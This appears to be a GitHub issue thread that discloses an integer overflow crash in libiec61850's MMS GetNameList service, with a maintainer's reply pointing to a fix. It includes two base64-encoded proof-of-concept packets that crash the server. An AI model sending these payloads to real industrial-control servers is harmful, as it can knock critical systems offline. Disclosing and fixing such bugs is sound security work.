Closed Alice-and-Bob closed 4 months ago
Hi, @mzillgith and team. If you handle the error as soon as possible, I will provide all possible information.
Hi, Thank you. However you are using a very old version of the library. Seems the problem is already fixed in the current versions of the library. But applying your poc2 seems to trigger another issue that should be fixed with commit https://github.com/mz-automation/libiec61850/commit/cf94d64206cf53298edf4799a75b31657bb7cbb3
Yes, I found the bug fixed by the cf94d64 branch using poc2 before yours. It is possible that I am mistaken about the poc and the vulnerability it corresponds to. However, this poc can cause SEGV errors in all versions before the fix is committed. I will address this in more detail in a separate issue.
Description
An integer overflow vulnerability was detected in the mMSserver_handleGetNamelist_service.c function in src/mms/iso_mms/server/mms_get_namelist_service.c. The vulnerability manifests as a SEGV and causes the application to crash.
version
v1.4.0 and earlier releases
system information
Ubuntu 18.04
proof of concept
poc
root@VirtualBox:/iec61850-poc/mms_get_namelist_service# base64 poc1 AwAAQQLwgAEAAQBhNDAyAgEAoC2gKwIBGqEmoAOAAQChDYGLVEVNUExBVH////+CEExMTjAkQ0Yk U3RyVmFsMjA=
root@VirtualBox:/iec61850-poc/mms_get_namelist_service# base64 poc2 AwAAPgLwgAEAAQBhMTAvAgEAoCqgKAIBbK0jgCEBoR6AHDAaoBihFhoLVEVURQLw gAEAAQBhMTAv AgEAoCqgKAIBbK0jgCEBTEQwAgFs3H/+/qEToAIARU1BVEVMRA==
poc_of_mms_get_namelist_service.zip
command
result
gdb